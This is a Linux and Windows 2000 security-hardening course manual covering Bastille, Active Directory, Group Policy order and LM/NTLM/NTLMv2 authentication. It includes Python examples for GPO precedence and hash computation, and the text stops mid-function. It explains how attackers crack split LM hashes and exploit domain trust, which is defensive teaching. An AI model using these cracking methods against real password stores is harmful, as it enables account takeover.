perl-Tk-800.023-9mdk.i586.rpm

Version numbers used in class may differ from these examples. If that is the case, alter your commands to reflect the different version numbers.

3. In a Terminal Window, navigate to the /bastille directory, and enter the following commands, in sequence:

rpm -ivh Bastille-2.0.4-1.0.i386.rpm
rpm --nodeps -ivh pwlib-1.3.3-5.i386.rpm
rpm --nodeps -ivh perl-Tk-800.023-9mdk.i586.rpm

Again, modify these lines to refer to the correct version numbers if you are using different releases of these RPMs.

The method by which you will be given these files will be explained by your instructor. In most cases, you will be provided with a CD-ROM or a network-share URL, or the files will already be on your hard drive.

You might get a message saying that pwlib is already installed. If so, continue with the activity.


4. After the RPMs are finished with their routines, enter bastille into the Terminal Window to start the Bastille program. A disclaimer is displayed.

5. Read the disclaimer, and enter accept to continue with the install. A GUI interface is displayed, where you will answer a series of questions to alter the configuration of your machine.

6. For each question, read the explanation, select the answer that best fits your requirements, and click OK to move to the next question. Don’t be concerned if this step takes a little while—there are a lot of questions and descriptions to read and answer.

7. When you are done with all of the modules, click OK to continue.

8. When you are prompted, save the configuration. When the Finishing Up window is displayed, click the Exit Without Changing System button.

You do not want to apply some of the possible settings, as this may have an adverse effect on your ability to participate in later exercises that use Linux.

9. Close all windows.

Summary

In this lesson, you examined the fundamentals of Linux operation. You created files and directories, and configured the security on them. You examined how the system secures passwords by using the shadow password file. You secured access to services, using TCP wrappers and xinetd. You also examined the security of several network services, and the lesson ended with the use of Bastille for final system hardening.

Lesson Review

3A What is the command to view the contents of a directory?

The ls command.

By default, a new user account has a UID of at least what?

500.

What is the default UID for the root account?

0.


3B What is the octal permission for the setting of rwx?

7.

What is the command to change ownership of an object?

The chown command.

What is the umask value if permissions are set to 000?

777.

Are the number of days to a password change stored in the /etc/passwd or the /etc/shadow file?

In the /etc/shadow file.

3C What are the two configuration files used by TCP wrappers to control access?

The /etc/hosts.deny and /etc/hosts.allow files.

What is the configuration file that controls xinetd?

The /etc/xinetd.conf file.

In xinetd, what line will grant access from the network host 10.20.23.45?

only_from 10.20.23.45

3D In NFS, what line will export the /tech directory to 10.20.30.41 with read and write access?

/tech 10.20.30.41(rw)

In NFS, what line will export the /policy directory to the 10.20.30.0/24 network with read-only access?

/policy 10.20.30.0/24(ro)

Why must you watch for a space in the configuration lines of an NFS export?

The space can change the meaning of the command. For example, a space between the host and permissions can change the permissions to become world-writeable.

What is the name of Samba’s primary configuration file?

smb.conf.

3E To add a password during system startup, what file do you need to modify?

The /etc/lilo.conf file.

What is the GUI tool to use to find services on the system?

The Service Configuration tool.

What is the GUI tool to use to view the /var/log files?

The Log Viewer tool.


What is the name of the text file that Tripwire reads to create its policy file?

The file is named twpol.txt.

What is the name of the perl script that will attempt to reverse changes that Bastille has made to a system?

The file is named undo.pl.


Hardening Windows Computers

Overview

In this lesson, you will investigate the concepts and procedures required to secure Microsoft Windows computers. You will examine everything from the basic principles of Windows NT security, up to the advanced issues of securing a Windows 2000 machine running Active Directory.

Objectives

In this lesson, you will:

4A Examine the concepts of Windows 2000 infrastructure security.

You will create a custom GPO and edit it to use in the securing of the Windows 2000 infrastructure.

4B Examine the fundamentals of authentication in Windows 2000.

You will describe the local logon process in Windows 2000.

4C Implement Windows 2000 security configuration tools.

You will implement and examine security templates, secedit.exe, and use the Security Configuration and Analysis Snap-in.

4D Secure Windows 2000 resources.

You will examine the security of Windows 2000 resources and configure security settings in the Registry.

4E Configure Windows 2000 auditing and logging.

You will configure auditing and logging on a Windows 2000 computer and analyze Security Log Event IDs.

4F Examine and configure EFS on Windows 2000.

You will examine the components of and implement the Encrypting File System (EFS) on Windows 2000.

4G Examine the methods of securing network communications in a Windows 2000 network.

You will examine the systems available to secure network communications in Windows 2000, and you will configure RADIUS and the securing of TCP/IP.

Data Files: NIST2kws.inf

Lesson Time: 6 hours

LESSON 4

Lesson 4: Hardening Windows Computers 235


Topic 4A

Windows 2000 Infrastructure Security

For years, Windows NT 4.0 served its market well. It provided a broad platform for business functions and gained widespread use and popularity. However, it was beginning to show its age, and Microsoft needed to move on. What it moved on to was Windows 2000.

With a completely different approach to managing the network, Windows 2000 has some new components that network administrators must get comfortable with. In this topic, you will take a look into these new components and how they tie into securing both the network itself and resources on the network.

In Windows 2000, if you install multiple computers in a logical group, and they share resources with one another, you have created a workgroup. The workgroup is commonly referred to as peer-to-peer networking because every machine is an equal, or peer, to the other. In a workgroup, you can have a server; it is simply referred to as a stand-alone server. In this case, there is no controlling security mechanism to the network, and each machine will use its own local security database to control access to resources.

In Windows 2000, a local security database is a list of user accounts and resource access data, located on each local computer. So, if you had a peer-to-peer network of 20 Windows 2000 computers, you would have 20 local security databases, one for each machine. Although this works, it is inefficient for management, both of resources and of security.

The major step up in the design of a Windows 2000 network came with the new domain model of Windows 2000. The multiple domain models of Windows NT 4.0 are gone. In their place is a design where you still group computers together, but they are controlled differently.

In a Windows 2000 domain, you have grouped together computers and users who share a central directory database. This directory database contains user accounts, security information, service information, and more, for the entire domain. Access to this directory is based on LDAP. This directory database and its access method together are referred to as Active Directory (AD), and also as the Windows 2000 directory service (NTDS).

The Windows 2000 domain model governed by AD is a replacement for all the domain models of Windows NT 4.0. In AD, there are no machines designated as Primary or Backup Domain Controllers. Instead, every server that will participate in the management of the domain is simply called a Domain Controller, and contains a master copy of the directory database. (Domain Controllers must be running Windows 2000 Server.)


A Windows 2000 domain is not bounded by location or network configuration. Machines that are in a domain can be close together on a LAN—connected via traditional Ethernet—or far apart over a WAN—connected via fractional T1, E1, or any other WAN technology.

The Active Directory is a database listing of information on each of the objects in the domain. This information includes how each of these objects will interact with other objects in the directory.

When you are using Active Directory in Windows 2000, this listing can include information on user accounts, groups, computers, servers, printers, security policies, and more. Active Directory may start out with a small number of objects and grow to hold thousands to millions of object listings.

Another critical component of Windows 2000 is DNS. The reason this is critical is the dependence of AD on DNS. Active Directory relies on DNS to provide the naming information required to locate resources on the network.

In addition to the information mentioned earlier, AD holds the information regarding access control. When a user logs on to the network, he or she is authenticated by information that has been stored in the Active Directory. When a user attempts to access an object, the information required to authorize such access is also stored in the Active Directory, and is called the Discretionary Access Control List (DACL).

Active Directory objects themselves can be organized into what are known as classes. Classes represent a logical grouping of objects, at the discretion of the administrator. Object class examples include user accounts, computers, domains, groups, and Organizational Units (OUs). You also have the ability to create containers, which can hold other objects. A container is an object that is able to hold computers, users, and/or other objects.

Active Directory Components

In Windows 2000, there are several critical components that make up a successful network implementation of Active Directory. These components are logical in nature and have no boundaries. They are domains, forests, trees, and Organizational Units (OUs). The components of AD that are more physical in nature are the domain controllers and sites (IP subnets that identify physical network segments). The functionality of AD separates the physical from the logical network structure.

Active Directory Logical Structure

One of the benefits to Active Directory is the ability to build a logical network that mirrors the logical structure of the organization. Using this logical structure is more intuitive to users, as they are able to find and identify resources by logical name, without having to have any knowledge of the physical layout of the network.

The main component behind the structure of Active Directory is the domain. A Windows 2000 Active Directory is comprised of at least one domain, but is not limited to one. Microsoft has termed the objects stored inside a domain as interesting. These interesting objects are defined as those objects which a user needs in the course of doing his or her job function. Examples of interesting objects include printers, databases, email addresses, other users, and more. Each domain holds information about all of the objects in the domain, and only those objects that belong to the domain. Domains are allowed to span one or more physical locations.

WAN: (Wide Area Network) A physical or logical network that provides capabilities for a number of independent devices to communicate with each other over a common transmission-interconnected topology in geographic areas larger than those served by local area networks.

Figure 4-1: A graphical example of the logical network layout of a Windows 2000 Active Directory network.

The domain itself is used as a boundary by which security controls can be in place. The Access Control List (ACL) is used to regulate specific access to domain objects, such as shared folders, for defined users. The ACL contains the permissions that are used to grant or deny access for an object, such as a user or group, to another object, such as a file, folder, or printer.

Within a domain itself you can have Organizational Units, or OUs. An OU is a logical holder that is used to further mirror the logical structure of the organization. An OU can contain users, groups, shared folders and printers, and even other OUs from the same domain. Every domain in the network can have a unique OU configuration—there is no dependency on other domains.

Security policies and policies concerning computer and user behavior (Group Policies) can be assigned to a stand-alone computer, a site, a domain, or an OU, as appropriate. It is possible to assign policies to each OU, but it is not required that you do so. If there is a policy that you want all of the OUs in the network to use, you can assign it to the parent OU or to the domain, because the default behavior is to allow child objects to inherit policies from their parents within the Active Directory. Another important item to note is that these Group Policies are themselves objects in AD; therefore, permissions can be assigned to them. For a policy to take effect upon an object, that object should have at least the Read and Apply Group Policy permissions for that policy.

Figure 4-2: A logical view of the objects an OU can contain.

Another new concept in Windows 2000 is that of forests and trees. A tree is a logical structure, created by the network design team, of one or more Windows 2000 domains that share a namespace. The domains fall in a hierarchical structure and follow DNS naming standards. As shown in Figure 4-3, child domains of SecurityCertified.Net use the parent names in their naming structure.

Figure 4-3: A domain tree for Windows 2000 using DNS naming standards.


In the Windows 2000 Active Directory structure, a forest is a collection of one or more independent domain trees. These independent trees are linked together with a trust, which will be defined in a moment. Each tree in the forest maintains its proper DNS naming system, and there is no requirement for any similar namespace from one tree to another. Each domain still functions on its own, but the logical connection of the forest enables enterprise-wide communication on the network. The new Windows Server 2003 (.NET) architecture will take this one step further—trusts can be implemented between forests to create a Federation. Figure 4-4 shows a forest of two trees.

Figure 4-4: Two unique domain trees tied together to make a forest.

The implementation of trust in a Windows 2000 Active Directory network is quite different from the Windows NT 4.0 implementation. In Windows 2000, all trusts between domains are, by default, two-way transitive trusts. These trusts, based on Kerberos version 5, are created automatically when a new domain is added to the tree. The domain that started the tree is considered the root domain, and each subsequent domain will form a two-way transitive trust upon joining the tree. It is due to this trust that users and computers from any domain are able to be authenticated at any other domain in the tree or forest. (The authorization is based on setting the appropriate permissions to do so.)

When older Windows domains are on the network, such as Windows NT 4.0 domains, a specific trust can be created. This is called an explicit one-way trust, and it is nontransitive. This way, a Windows 2000 network, running Active Directory, can have communications with an older Windows NT 4.0 domain.

Another option for manually creating trusts is to connect two Windows 2000 domains that are far down the trees of different forests. This can help to speed up communication between the two domains. These are known as shortcut trusts.

While discussing trust, one interesting thing to note, from a security professional’s perspective, is how an attacker can take advantage of trust with only a rogue laptop running a Windows NT 4.0 domain and a network connection to a default installation of a Windows 2000 domain. Such a rogue machine can offer its trust to the Windows 2000 domain and obtain the complete list of users and groups from the Windows 2000 domain without any authentication whatsoever. However, this vulnerability has been addressed in the Microsoft Security Rollup package.

A transitive trust means that if Domain C trusts Domain B, and Domain B trusts Domain A, then Domain C also trusts Domain A.


Active Directory Physical Structure

Although the majority of the design and implementation of the Active Directory network is on the logical side, the physical side must also be addressed. The main components of the physical side of Active Directory are sites, the links between the sites, and the Domain Controllers.

The site, as defined by Microsoft, “is a combination of one or more Internet Protocol (IP) subnets connected by a highly reliable and fast link to localize as much network traffic as possible.” A fast link is generally referred to when the connection speed is at least 512 Kbps. In other words, the site is designed to mirror the physical structure of your network and may or may not be made up of different IP subnets.

Remember that the domain is designed to mirror the logical needs of the network, and apply that same logic to designing a network using physical aspects. There is no correlation between the site and the domain. It is possible to have multiple domains in a site, and it is possible to have multiple sites for one domain.

A site is also not part of the DNS namespace. This means that when browsing the directory, you will see user and computer accounts managed by domain and/or OU, but not by site. The only thing a site contains is Computer objects and objects relevant to the connection and replication from one site to another.

The other component of the physical makeup of Active Directory is the actual Domain Controllers (DCs) themselves. These machines, which must be running Windows 2000 Server, each have an exact replica of the Domain Directory. In fact, when making a change on a DC that has an effect on the Active Directory, all other DCs will receive this replicated change. Because any domain controller can authenticate a user to the network, each controller is required to have this Directory. The basic breakdown of the Domain Controller in terms of what it provides to the network is:

• Each DC stores a copy of Active Directory information that is relevant to that domain (also referred to as an AD partition).

• Each DC replicates changes, at admin-defined intervals, to all the other DCs to ensure a consistent view of the network.

• Each DC replicates critical changes to all the other DCs immediately.

• Each DC is able to authenticate user logon requests.

Windows 2000 DNS

In order for the Active Directory to function in any capacity, DNS must be running for the network. The implementation of the DNS namespace will be the foundation on which the AD namespace is built. By following this procedure, you are able to have fluid IP communication, using names that users are familiar with, across the network and on the Internet.

A new feature of Windows 2000 is Dynamic DNS (DDNS). DDNS enables clients that receive their IP addresses automatically (via a DHCP server) to have their names and IP addresses registered with the network. With a DDNS server running in the network, the client machines will automatically communicate with the server, announcing their name and address combinations, and will update DNS information with no user intervention required.


One of the advantages to running DDNS in a network is the ability to eliminate other protocols and services that might be running in order to locate resources. For example, the Windows Internet Name Service (WINS) of Windows NT 4.0 is no longer required, and the use of NetBEUI as a communication protocol is no longer required, but might be needed to provide backward compatibility.

Group Policy Components

The final component of the Windows 2000 infrastructure we are going to discuss is the group policy. A group policy is a logical grouping of user and computer settings that can be applied to computers, domains, OUs, and sites. For example, you can configure a group policy setting to remove objects from the Start menu.

When you configure group policy settings, they are placed in what is called a Group Policy Object, or GPO. The GPO is then responsible for controlling the application of the policy to Active Directory objects, such as sites, OUs, and domains. Once a GPO is configured, it is applied to the AD object as assigned, and by default, the policy will affect all computers that are in the AD object.

Having the policy affect all computers may not be your desired result, so you do have the ability to filter how the policy will be implemented for computers and users. The filtering will use Access Control Lists (ACLs), as designed by you.

Some of the rules for applying a GPO are as follows:

• A GPO can be associated with more than one domain.

• A GPO can be associated with more than one OU.

• A domain can be associated with more than one GPO.

• An OU can be associated with more than one GPO.

As you can see, you are allowed a lot of flexibility in GPO implementation. However, before getting too far into the implementation, you must take a step back and look into the GPO itself in more detail.

Group Policy Implementation

To start with the configuration of a GPO, you must open and use the Group Policy Editor. As with most of the management options in Windows 2000, this can be opened via the Microsoft Management Console (MMC).

In the Group Policy Editor, you are presented with two parent nodes to manage, User Configuration and Computer Configuration. Both nodes belong to the GPO you are editing; the settings you define under them are what the GPO later applies, as per your requirements.

• The Computer Configuration node provides the option to manage the behavior of the operating system, account policies, IP security policies, and more.

• The User Configuration node provides the option to manage behavior that is unique to the user, such as Desktop settings, Control Panel settings, Start menu settings, and more.


TASK 4A-1
Configuring a Custom MMC and GPO

1. Boot your computer to Windows 2000, and log on as Administrator.

2. From the Start menu, choose Run and enter mmc into the Run dialog box to start the default Microsoft Management Console.

3. Choose Console→Add/Remove Snap-In.

4. Click the Add button.

5. Scroll down in the list, select Group Policy, and click Add. You will be asked to select the location for the Group Policy Object.

6. Leave the GPO selection of storing on the local computer, and click Finish.

7. Click Close, and then click OK to close the Add/Remove Snap-in window.

8. Choose Console→Save, and save this console as Custom_GPO. The new Console object you created will now be available in your Administrative Tools and can be accessed through the Start menu. You might also want to create a shortcut to it on the Windows Desktop.

Editing GPOs

Once you have created GPOs, you can edit and further customize them. Bear in mind that domain GPOs are AD objects (with their files stored in SYSVOL), while the Local Computer Policy lives only on that machine. The security settings of a GPO can be exported to a security template (.inf) file, which you can send to another administrator in your company to tweak further for the task at hand and import elsewhere. In the following task, you will edit your GPO to control password settings.


TASK 4A-2
Editing a GPO

Setup: You are logged on to Windows 2000 as Administrator, and the Custom_GPO console is running.

1. Expand Local Computer Policy.

2. If necessary, expand Computer Configuration.

3. Expand Windows Settings.

4. Expand Security Settings.

5. Expand Account Policies, select Password Policy, and double-click the Enforce Password History option.

6. For the number of passwords to remember, enter 5 and click OK.

7. Right-click the Maximum Password Age option and choose Security.

8. For the maximum age of passwords, enter 30 days and click OK.

9. If you are prompted to change related values, click OK to reset the Minimum Password Age.

10. Observe the console. The Local Settings you just adjusted are different than the currently effective (default) settings. However, if you close and reopen the GPO, the altered settings will become the effective settings.

11. Close the Custom_GPO without saving settings, and then reopen it. Verify that the local and effective settings match.

Enforcing GPOs

Once you create and edit a GPO, it must be enforced to have any effect on the network. As discussed, there can be GPOs on sites, domains, and OUs, so being aware of the order of implementation is critical to proper GPO deployment.

1. The first GPO that is processed is the local GPO. Every Windows 2000 computer has a GPO stored locally. Although this is the first GPO processed, it is not practical to maintain custom configurations on each machine on the network, so administrators often move right past the local GPO. Remember that because it is processed first, anything set locally is overridden by the site, domain, and OU GPOs that follow.

2. After the local GPO is processed, the site GPO is implemented. Because there can be multiple GPOs for one site, it is up to the administrator to define the order of implementation, which is done in the Site Properties.

3. Once the site GPO has been processed, the domain GPO is implemented. Just as there can be multiple GPOs for a site, there can be multiple GPOs for a domain, so the administrator must take care to define the order of implementation here as well.

4. The final GPO to be processed is the OU GPO (parent OUs before child OUs). Again, as in the other implementations, more than one GPO may be linked to the OU, and, as such, the administrator is required to properly plan and implement the GPOs as desired.

In each location (site, domain, or OU) where there can be more than one GPO, the place to modify the GPO order is in the Properties of the location. For example, in the Site Properties, when multiple GPOs are listed, the option to move them Up or Down is present. The GPO highest on the list has the highest priority: it is processed last within that container, so its settings take precedence over GPOs that are lower on the list.

Knowledge of the implementation order of the GPOs is critical for anyone who works to secure and manage a Windows 2000 network. By looking at the implementation order, you can identify that if a site GPO was defined to disable the Restrict CD-ROM Access To Locally Logged-on User Only setting, and the domain GPO defined that same setting as Enabled, then the setting for computers belonging to that site and domain would be Enabled, as the domain GPO was processed after the site GPO.
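The following Python model is an added example, not part of the course material or of any Microsoft tool. It applies the processing order and link-order rules just described to a constructed set of GPOs (the GPO names are fictitious) and reports, for each setting, which GPO supplied the winning value. It reproduces the CD-ROM conflict from the text and adds a domain with two linked GPOs, so you can see the top-of-list GPO win within its container. No Override, Block Policy Inheritance and ACL filtering are deliberately left out of the model.

```python
from typing import Dict, List, Tuple

# A GPO is modelled as {"name": ..., "settings": {setting: value}}; a setting that a
# GPO leaves "Not Configured" is simply absent from its dictionary.
GPO = Dict[str, object]


def effective_policy(chain: List[Tuple[str, List[GPO]]]) -> Dict[str, Dict[str, object]]:
    """Resolve the settings a computer ends up with after Group Policy processing.

    chain lists the containers in Windows 2000 processing order: local, site, domain,
    then each OU from the top of the tree down. For each container the GPO list is
    given as it appears in that container's Properties, top entry first. Windows
    applies the list from the bottom up, so the top entry overrides the rest of its
    container, and every later container overrides the earlier ones. No Override,
    Block Policy Inheritance and ACL filtering are not modelled (assumption made for
    this example). Returns, per setting, the winning value and the GPO that supplied it.
    """
    result: Dict[str, Dict[str, object]] = {}
    for scope, gpos in chain:
        for gpo in reversed(gpos):  # bottom of the list first, so the top entry writes last
            for setting, value in gpo["settings"].items():
                result[setting] = {"value": value, "source": f"{scope}:{gpo['name']}"}
    return result


CDROM = "Restrict CD-ROM access to locally logged-on user only"
LMLEVEL = "LAN Manager authentication level"
MAXAGE = "Maximum password age (days)"


def demo() -> Dict[str, Dict[str, object]]:
    """Constructed example: the site/domain CD-ROM conflict from the text, plus a
    domain with two linked GPOs to show link order. All GPO names are fictitious."""
    chain = [
        ("local", [{"name": "Local Computer Policy",
                    "settings": {CDROM: "Disabled", LMLEVEL: "Send LM & NTLM responses"}}]),
        ("site", [{"name": "HQ-Site-Baseline", "settings": {CDROM: "Disabled"}}]),
        ("domain", [
            # top of the domain's list: highest priority within the domain
            {"name": "Domain-Hardening", "settings": {LMLEVEL: "Send NTLMv2 response only"}},
            {"name": "Domain-Default", "settings": {CDROM: "Enabled",
                                                    LMLEVEL: "Send LM & NTLM responses"}},
        ]),
        ("ou", [{"name": "Servers-OU", "settings": {MAXAGE: 30}}]),
    ]
    return effective_policy(chain)


if __name__ == "__main__":
    for setting, winner in demo().items():
        print(f"{setting}: {winner['value']}  (from {winner['source']})")
```

Run it and the CD-ROM setting resolves to Enabled from the domain GPO, exactly as the text argues, while the LAN Manager level resolves to the Domain-Hardening GPO even though Domain-Default also sets it, because Domain-Hardening sits at the top of the domain's list.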

TASK 4A-3
Implementing Multiple GPOs

Objective: To examine the impact of implementing GPOs at different levels and to determine the final policy settings that will be in effect.

1. You have been assigned to define Internet Explorer settings for users in your enterprise, and you decide to experiment with defining GPOs at various levels. If you define the following GPOs, what will the final result be when a user in this OU logs on and runs IE?

• At the site level, the Configure Toolbar Buttons policy is to be Enabled, and the Show Back Button and Show Home Button options are checked.

• At the domain level, the Configure Toolbar Buttons policy is to be Enabled, the Show Back Button option is unchecked, and the Show Stop Button option is checked.

• At the OU level, the Configure Toolbar Buttons policy is to be Enabled, and the Show Search Button and Show History Button options are checked.

The user will see only the Search and History buttons. All three GPOs enable the same Configure Toolbar Buttons policy, and the check boxes are parts of that one policy setting, not separate settings: whichever GPO is processed last for the setting writes the state of every button it controls, checked buttons on and unchecked buttons off. Because the OU-level GPO is processed last, its check box states win and the Home and Stop choices made at the site and domain levels are overwritten. To accumulate buttons across levels, each later GPO would have to repeat the earlier choices. Verify the result on a test workstation before rolling a layered design out.

If students are interested and time permits, you might want to demonstrate the GPO implementation shown here so that students can see the resulting policy settings. If so, you will need to run dcpromo to install Active Directory.


Topic 4B
Windows 2000 Authentication

Despite all the advancements and new components of Windows 2000, one thing remains the same: a user must be authenticated to access resources on the network. Where Windows 2000 starts to look new in comparison with earlier versions is with the methods of authentication that it can use. Windows 2000 can use any of the following for authentication: Kerberos, NTLM, NTLMv2, LM, RADIUS, SSL, Smart Cards, and more.

Windows 2000 uses what is called the Security Support Provider Interface (SSPI) to allow for these methods of authentication. The SSPI functions between the user applications, such as the Web browser, and the authentication method, such as NTLM or Kerberos. This means that an application developer need not create an application for each type of authentication, but rather can create one application that communicates with SSPI.

Although the SSPI plays an important function in the authentication of users, it is not something that administrators spend time with, as there are no options for configuration or management involved in the SSPI. It simply connects authentication requests to the authentication packages provided by the system.

Where the authentication process starts to involve the administrators more is in the security architecture of Windows 2000. The security architecture of Windows 2000 is comprised of parts of both the operating system and Active Directory. For example, account information and policy settings are stored in AD, while the OS holds the security processes that implement them and the information regarding trusts to and from other areas of the network.

If you have installed a new Windows 2000 domain, and all machines are running Windows 2000, the default method of authentication is Kerberos. You can, of course, change the authentication method, but the default will be Kerberos.

A newly installed Windows 2000 domain runs in what is called mixed mode. In a mixed-mode domain, both Windows NT 4.0 BDCs and Windows 2000 domain controllers can be present. This allows for maximum communication options over the network, but does not present the most secure environment, because the domain must keep supporting the authentication options of both systems, including LM and NTLM for the down-level machines.

Authentication Methods

In earlier OSs, before Windows NT 4.0 with Service Pack 4 (SP4), there were only two supported methods of what is called challenge/response authentication: LAN Manager (LM) and Windows NT LAN Manager (NTLM). NT 4.0 SP4 added the stronger NTLMv2, and Windows 2000 includes it, along with the policy setting for controlling which of the three a computer sends and accepts.

SSL (Secure Sockets Layer): A session-layer protocol that provides authentication and confidentiality to applications.

security architecture: A detailed description of all aspects of the system that relate to security, along with a set of principles to guide the design. A security architecture describes how the system is put together to satisfy the security requirements.


LM Authentication

In order to provide maximum compatibility, the ability to communicate with older systems is a requirement. If the older systems are using LAN Manager authentication, this introduces a vulnerability to the network.

LM authentication works from a password that is limited to 14 characters drawn from the OEM (single-byte) character set. Worse, the passwords are not case-sensitive: a password can be typed in upper- and lower-case letters, but the system converts every letter to upper case before hashing it, which shrinks the effective character set to the 26 upper-case letters, 10 digits and 33 printable symbols, 69 characters in all. Symbols are allowed, but the case folding alone throws away half of the alphabet.

In Windows systems, passwords are not stored or visible anywhere in their plaintext form, for good reason. Instead, they are stored as hashes, one-way values that represent the passwords. The way that an LM hash is created also presents a potential weakness. The LM password can be a maximum of 14 characters.

The computer takes the upper-cased password, pads it with null bytes to exactly 14 characters, and splits it into two 7-character chunks. Each character is one byte, so in essence there are now two 7-byte values. Each 7-byte value is used as a 56-bit DES key to encrypt the same 8-byte constant (the ASCII string KGS!@#$%). The two 8-byte outputs are then listed next to one another to provide the final 16-byte hash value. There is no salt, so two accounts with the same password have the same LM hash, and a password of 7 characters or fewer leaves the second half all nulls, which always produces the constant AAD3B435B51404EE. Figure 4-5 shows this process.

Figure 4-5: The generation of an LM hash.

vulnerability: A hardware, firmware, or software flaw that leaves an AIS (automated information system) open to potential exploitation; a weakness in automated system security procedures, administrative controls, physical layout, internal controls, and so forth, that could be exploited by a threat to gain unauthorized access to an AIS.



Once the hash value has been calculated, you can look at it and see a long string of characters, thinking it looks secure. But the weaknesses of LM hashing quickly become apparent. The first issue is the character set. Counting letters only, as the text does, a 14-character password gives a space of 26^14, approximately 6.5 × 10^19, or about 66 bits of work to search; counting the full 69-character upper-case set gives 69^14, approximately 5.5 × 10^25. Either figure would be respectable if the hash were computed over the whole password at once.

However, the second issue, the split in the password, comes quickly into play. In the previous example, the password was split into two chunks, MYPASSW and ORDISLO, and each chunk is hashed independently. The two halves can therefore be attacked separately and at the same time, so the password space is really 26^7 + 26^7, approximately 1.6 × 10^10, or about 34 bits in total; each half on its own is only 26^7, about 2^33, and with the full 69-character set 69^7 is still only about 7.5 × 10^12, or 2^43. Because there is no salt, one table of precomputed half-hashes serves for every account.

The second half of the password will generally be attacked first. This is due to the fact that most people do not use a password that is a full 14 characters, so the second half is padded with nulls and there are fewer characters to recover; if the second half is the well-known all-null value, the attacker knows immediately that the password is 7 characters or shorter. Second, the characters that are cracked can reveal clues as to the first half of the password.

NTLM Authentication

When Microsoft was developing Windows NT, an opportunity arose to improve on the weaknesses of LM authentication. The result was the Windows NT LAN Manager (NTLM) authentication method.

A primary enhancement that NTLM offered over LM was that the character set could now include the full Unicode set. This allowed for characters outside of letters and preserved the distinction between upper- and lower-case letters. This was a significant improvement. The password is passed to the hash as a sequence of 16-bit Unicode (UTF-16LE) characters, and it is not truncated to 14 characters: the 14-character limit on NT 4.0 came from the logon dialog box, not from the hash, and Windows 2000 accepts passwords of up to 127 characters.

The Unicode password is then converted into a 128-bit hash value by using Message Digest 4 (MD4), developed by Ron Rivest. This is what is commonly referred to as the NTLM hash (or NT hash). Like the LM hash it is unsalted, so identical passwords always produce identical hashes. Figure 4-6 shows the generation of an NTLM hash.

Figure 4-6: The generation of an NTLM hash.

Although a full 128-bit, case-sensitive hash provides better protection against attacks, there is an issue with the implementation of NTLM in Windows. In order for Windows to remain backward-compatible, it was decided to store the equivalent LM hash alongside the NTLM hash whenever the password is 14 characters or shorter. This allows newer Windows computers to communicate with older systems, but it also means the weak hash is present to be cracked.



Because Windows stores both the NTLM and LM values for each user, an attacker will work on cracking the LM hash first. Once that is recovered, the attacker can run a simple brute-force test over the case of each letter to determine the exact password, since the NTLM hash is case-sensitive. For local accounts the NTLM and LM values are stored in the SAM portion of the Windows Registry; for domain accounts they are stored in Active Directory on the domain controllers.

NTLMv2

NTLMv2 was introduced in the continuing line of evolving authentication. NTLMv2 allows for control over the use of traditional LM by the client and the server. The stored secret is still the MD4-based NT hash, but the response to the server's challenge is computed with HMAC-MD5 keyed with that hash, and the response also covers the user name, domain name, a timestamp, and a client-chosen nonce, which defeats precomputed response tables. NTLMv2 session security adds confidentiality and integrity to the session using 128-bit keys; where United States export restrictions prevented the 128-bit version, it was installed in 56-bit mode.

The addition of the controls on the backward-compatible features of LM is a significant improvement to the security of the network. Figure 4-7 shows where the settings of the authentication options are made.

Figure 4-7: Local Security Policy options for authentication.

SYSKEY

Windows stores both the LM and NTLM hashes in the Registry. This is yet another reason for proper security controls on Registry access. However, if the SAM can be copied off the computer, for example by booting from another disk, or if the hashes can be dumped from the Registry using software, extra protection is required.

Microsoft introduced a means of securing the SAM called System Key, or SYSKEY for short. SYSKEY uses a secret 128-bit key to encrypt the password hashes in the SAM database, making it more difficult to pull the hashes off a disk and crack them. SYSKEY had to be added to a Windows NT system (it shipped with NT 4.0 Service Pack 3) and is included in Windows 2000 by default. Note what it protects: hashes at rest on disk. Software running with SYSTEM privileges on a live machine can still read the decrypted hashes, so SYSKEY complements, rather than replaces, controls on who can run code on the server.


A common question is: "Where do I store, or what do I do with, the SYSKEY value itself?" The key must be available at boot and must be protected. There are three options for managing SYSKEY on a system:

• Allow the computer to generate a random key as the System Key and store the key, obscured, in the Registry. The key is used automatically when the system restarts, and input from the user who started the system is not required. This is the weakest of the three options, because the key lives on the same disk as the SAM it protects.

• Allow the computer to generate a random key and store the key on a floppy disk. The system prompts for the disk during startup.

• Create a password and remember it. The System Key is derived from the password, which is entered when prompted during the startup sequence.

The Challenge and Response

All of the authentication methods discussed so far, LM, NTLM, and NTLMv2, use what is called challenge/response authentication. Without assigning specific numbers to the sequence of events, the following steps define the general process of the challenge/response system:

1. The client initiates the authentication process by bringing up the logon screen and requesting to log on.

2. The server sends a random string of bytes to the client. This is called the challenge.

3. The user enters a username and password. The hash of the user's password is used to encrypt (or, in NTLMv2, to key an HMAC over) the challenge, and the result is returned to the server. This is called the response.

4. The server performs the same computation on the challenge using the stored hash of the user's password. If the server's value matches the client's value, the user is authenticated.

Note that the plaintext password is never sent and is never needed by the server: the stored hash alone is enough to compute a valid response. The hash is therefore a password-equivalent for these protocols, which is why protecting the SAM (see SYSKEY) matters as much as protecting the password itself.
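The following Python program is an added example written for this edition, not code from the course or from Microsoft. It puts the LM, NTLM, NTLMv2 and challenge/response discussion above into running code: it computes the NT hash (MD4 over the UTF-16LE password, with MD4 written out because many current hashlib builds no longer expose it), performs the LM pre-processing that splits a password into two independent 7-byte DES keys (the DES step itself is left out), compares the letters-only brute-force figures from the text with the real 69-character upper-case set, and runs one NTLMv2 challenge/response between a client holding the password and a server holding only the stored hash. The user name, domain name and password are constructed for the example, and the NTLMv2 client blob is a simplified version of the real structure.

```python
import hashlib
import hmac
import math
import os
import struct


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, written out because hashlib no longer exposes MD4 on many
    OpenSSL 3 builds. The NT hash is MD4 over the UTF-16LE password, unsalted."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rounds = (
        (lambda x, y, z: (x & y) | (~x & z), 0x00000000, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
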